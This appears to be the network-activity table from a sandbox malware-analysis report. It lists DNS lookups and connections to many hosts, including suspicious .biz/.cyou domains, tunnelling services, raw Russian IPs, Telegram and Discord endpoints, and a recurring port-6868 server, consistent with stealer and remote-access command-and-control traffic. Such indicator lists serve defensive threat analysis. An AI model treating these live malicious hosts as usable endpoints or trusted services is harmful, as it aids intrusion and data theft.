| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gateway.discord.gg | udp |
| US | 162.159.133.234:443 | gateway.discord.gg | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 234.133.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.128.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.102.89.159.in-addr.arpa | udp |
| FR | 194.59.30.220:1336 | tcp | |
| US | 8.8.8.8:53 | 220.30.59.194.in-addr.arpa | udp |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| US | 8.8.8.8:53 | 10.244.41.31.in-addr.arpa | udp |
| RU | 31.41.244.12:80 | 31.41.244.12 | tcp |
| US | 8.8.8.8:53 | 12.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| FR | 142.250.179.67:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| FR | 142.250.179.67:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.74.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 88.221.135.105:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 96.33.115.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| RU | 31.41.244.9:80 | 31.41.244.9 | tcp |
| US | 8.8.8.8:53 | 105.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.249.124.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.244.41.31.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | grahm.xyz | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 31.10.203.116.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 66.45.226.53:7777 | 66.45.226.53 | tcp |
| RU | 89.169.40.170:143 | tcp | |
| RU | 89.169.41.157:8080 | tcp | |
| RU | 213.108.19.30:445 | tcp | |
| RU | 89.169.1.23:80 | tcp | |
| RU | 89.169.20.205:49158 | tcp | |
| RU | 89.169.1.26:8081 | tcp | |
| RU | 89.169.0.127:8291 | tcp | |
| US | 8.8.8.8:53 | e5.o.lencr.org | udp |
| GB | 88.221.134.137:80 | e5.o.lencr.org | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 53.226.45.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.19.108.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 82.190.18.2.in-addr.arpa | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | infect-crackle.cyou | udp |
| US | 104.21.45.165:443 | infect-crackle.cyou | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | 165.45.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | fightlsoser.click | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 172.67.213.48:443 | fightlsoser.click | tcp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.123.95.227:443 | steamcommunity.com | tcp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | peerhost59mj7i6macla65r.com | udp |
| US | 8.8.8.8:53 | ikswccmqsqeswegi.xyz | udp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| US | 8.8.8.8:53 | aukuqiksseyscgie.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| GB | 104.123.95.227:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 64.206.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.213.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.95.123.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.172.154.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.191.200.185.in-addr.arpa | udp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 154.216.18.132:6868 | tcp | |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | drive-connect.cyou | udp |
| US | 104.21.79.7:443 | drive-connect.cyou | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | 7.79.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| FR | 23.217.238.254:443 | steamcommunity.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 154.216.18.132:6868 | tcp | |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 254.238.217.23.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | a1060630.xsph.ru | udp |
| RU | 141.8.192.138:80 | a1060630.xsph.ru | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | 138.192.8.141.in-addr.arpa | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| DE | 101.99.92.189:8080 | tcp | |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 189.92.99.101.in-addr.arpa | udp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | ikswccmqsqeswegi.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | f0706909.xsph.ru | udp |
| US | 8.8.8.8:53 | ipwho.is | udp |
| RU | 141.8.193.236:80 | f0706909.xsph.ru | tcp |
| US | 154.216.18.132:6868 | tcp | |
| DE | 195.201.57.90:80 | ipwho.is | tcp |
| US | 8.8.8.8:53 | 90.57.201.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.193.8.141.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 154.216.18.132:6868 | tcp | |
| GB | 193.63.58.76:9001 | tcp | |
| N/A | 127.0.0.1:53792 | tcp | |
| N/A | 127.0.0.1:53910 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | 76.58.63.193.in-addr.arpa | udp |
| DE | 89.58.54.129:443 | tcp | |
| FR | 94.23.172.32:443 | tcp | |
| US | 8.8.8.8:53 | 32.172.23.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.54.58.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sanboxland.pro | udp |
| GB | 89.35.131.209:80 | sanboxland.pro | tcp |
| US | 8.8.8.8:53 | 209.131.35.89.in-addr.arpa | udp |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | a1059592.xsph.ru | udp |
| RU | 141.8.192.138:80 | a1059592.xsph.ru | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | f1043947.xsph.ru | udp |
| RU | 141.8.192.151:80 | f1043947.xsph.ru | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | 151.192.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a1051707.xsph.ru | udp |
| RU | 141.8.192.217:80 | a1051707.xsph.ru | tcp |
| US | 8.8.8.8:53 | 217.192.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 8.8.8.8:53 | freegeoip.app | udp |
| US | 172.67.160.84:443 | freegeoip.app | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| FR | 142.250.75.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 84.160.67.172.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | 227.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipbase.com | udp |
| US | 104.21.85.189:443 | ipbase.com | tcp |
| US | 8.8.8.8:53 | 189.85.21.104.in-addr.arpa | udp |
| US | 154.216.17.90:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| RU | 176.113.115.19:80 | 176.113.115.19 | tcp |
| US | 8.8.8.8:53 | 19.115.113.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.speak-a-message.com | udp |
| DE | 195.201.119.163:80 | www.speak-a-message.com | tcp |
| US | 8.8.8.8:53 | awake-weaves.cyou | udp |
| US | 154.216.18.132:6868 | tcp | |
| US | 104.21.27.188:443 | awake-weaves.cyou | tcp |
| US | 8.8.8.8:53 | 163.119.201.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.27.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipwho.is | udp |
| DE | 195.201.57.90:80 | ipwho.is | tcp |
| US | 8.8.8.8:53 | immureprech.biz | udp |
| US | 172.67.207.38:443 | immureprech.biz | tcp |
| US | 8.8.8.8:53 | deafeninggeh.biz | udp |
| US | 8.8.8.8:53 | jrqh-hk.com | udp |
| US | 104.21.16.1:443 | deafeninggeh.biz | tcp |
| CN | 123.136.92.99:80 | jrqh-hk.com | tcp |
| US | 8.8.8.8:53 | 38.207.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.16.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | effecterectz.xyz | udp |
| US | 8.8.8.8:53 | diffuculttan.xyz | udp |
| US | 8.8.8.8:53 | debonairnukk.xyz | udp |
| US | 8.8.8.8:53 | wrathful-jammy.cyou | udp |
| US | 104.21.74.196:443 | wrathful-jammy.cyou | tcp |
| US | 8.8.8.8:53 | 99.92.136.123.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.74.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | sordid-snaked.cyou | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 172.67.141.195:443 | sordid-snaked.cyou | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 195.141.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.143.214.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | login-donor.gl.at.ply.gg | udp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.135.159.162.in-addr.arpa | udp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.148.83.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | id71.internetid.ru | udp |
| RU | 95.213.205.83:5655 | id71.internetid.ru | tcp |
| US | 8.8.8.8:53 | 83.205.213.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aukuqiksseyscgie.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| RU | 77.223.124.212:5655 | tcp | |
| US | 8.8.8.8:53 | 212.124.223.77.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | ship-amongst.gl.at.ply.gg | udp |
| US | 147.185.221.24:14429 | ship-amongst.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 24.221.185.147.in-addr.arpa | udp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | testinghigger-42471.portmap.host | udp |
| DE | 193.161.193.99:42471 | testinghigger-42471.portmap.host | tcp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | 3.26.192.23.in-addr.arpa | udp |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.17.90:80 | tcp | |
| DE | 193.161.193.99:42471 | testinghigger-42471.portmap.host | tcp |
| N/A | 192.168.56.1:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| DE | 193.161.193.99:42471 | testinghigger-42471.portmap.host | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | updates.signiant.com | udp |
| US | 154.216.18.132:6868 | tcp | |
| DE | 13.32.121.30:80 | updates.signiant.com | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 30.121.32.13.in-addr.arpa | udp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | www.hootech.com | udp |
| US | 107.191.125.184:80 | www.hootech.com | tcp |
| US | 8.8.8.8:53 | portals.mediashuttle.com | udp |
| US | 76.223.25.251:443 | portals.mediashuttle.com | tcp |
| US | 8.8.8.8:53 | 184.125.191.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.25.223.76.in-addr.arpa | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| N/A | 192.168.56.1:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.17.90:80 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 147.185.221.24:14429 | ship-amongst.gl.at.ply.gg | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | webcdn.triongames.com | udp |
| GB | 2.19.117.96:80 | webcdn.triongames.com | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| DE | 87.120.84.32:80 | 87.120.84.32 | tcp |
| US | 8.8.8.8:53 | 96.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.68.81.185.in-addr.arpa | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| RU | 185.81.68.147:1912 | tcp | |
| US | 8.8.8.8:53 | 32.84.120.87.in-addr.arpa | udp |
| BG | 195.230.23.72:8085 | 195.230.23.72 | tcp |
| US | 8.8.8.8:53 | get.geojs.io | udp |
| US | 172.67.70.233:443 | get.geojs.io | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | 72.23.230.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.70.67.172.in-addr.arpa | udp |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 43.113.215.185.in-addr.arpa | udp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| DE | 94.156.177.133:7000 | tcp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | 133.177.156.94.in-addr.arpa | udp |
| NL | 80.82.65.70:80 | 80.82.65.70 | tcp |
| US | 8.8.8.8:53 | 70.65.82.80.in-addr.arpa | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| N/A | 192.168.56.1:4782 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | boot-01.net.anydesk.com | udp |
| DE | 195.181.174.173:443 | boot-01.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | relay-ad195ac5.net.anydesk.com | udp |
| GB | 57.128.141.163:80 | relay-ad195ac5.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | 173.174.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.141.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.playanext.com | udp |
| DE | 18.245.86.26:80 | api.playanext.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| RU | 185.81.68.147:1912 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.17.90:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | boot.net.anydesk.com | udp |
| FR | 57.128.64.30:443 | boot.net.anydesk.com | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | relay-0135ac48.net.anydesk.com | udp |
| GB | 57.128.141.165:443 | relay-0135ac48.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | 30.64.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.141.128.57.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | 18.102.255.239.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| N/A | 192.168.56.1:4782 | tcp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 154.216.18.132:6868 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| TH | 165.154.184.75:80 | 165.154.184.75 | tcp |
| US | 8.8.8.8:53 | 75.184.154.165.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | www.grupodulcemar.pe | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| PE | 161.132.57.101:443 | www.grupodulcemar.pe | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| FR | 142.250.75.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 101.57.132.161.in-addr.arpa | udp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | grahm.xyz | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| N/A | 192.168.56.1:4782 | tcp | |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 154.216.18.132:6868 | tcp | |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| HK | 47.244.167.171:801 | tcp | |
| US | 8.8.8.8:53 | drive-connect.cyou | udp |
| US | 104.21.79.7:443 | drive-connect.cyou | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 171.167.244.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 154.216.18.132:6868 | tcp | |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| BG | 195.230.23.72:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| BG | 195.230.23.72:80 | tcp | |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| FR | 23.217.238.254:443 | steamcommunity.com | tcp |
| BG | 195.230.23.72:80 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| BG | 195.230.23.72:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| N/A | 192.168.56.1:4782 | tcp | |
| US | 8.8.8.8:53 | youtube.com | udp |
| FR | 172.217.18.206:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | firefox-api-proxy.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | youtube.com | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 34.149.97.1:443 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | tcp |
| US | 34.149.97.1:443 | firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 206.18.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | 160.181.213.54.in-addr.arpa | udp |
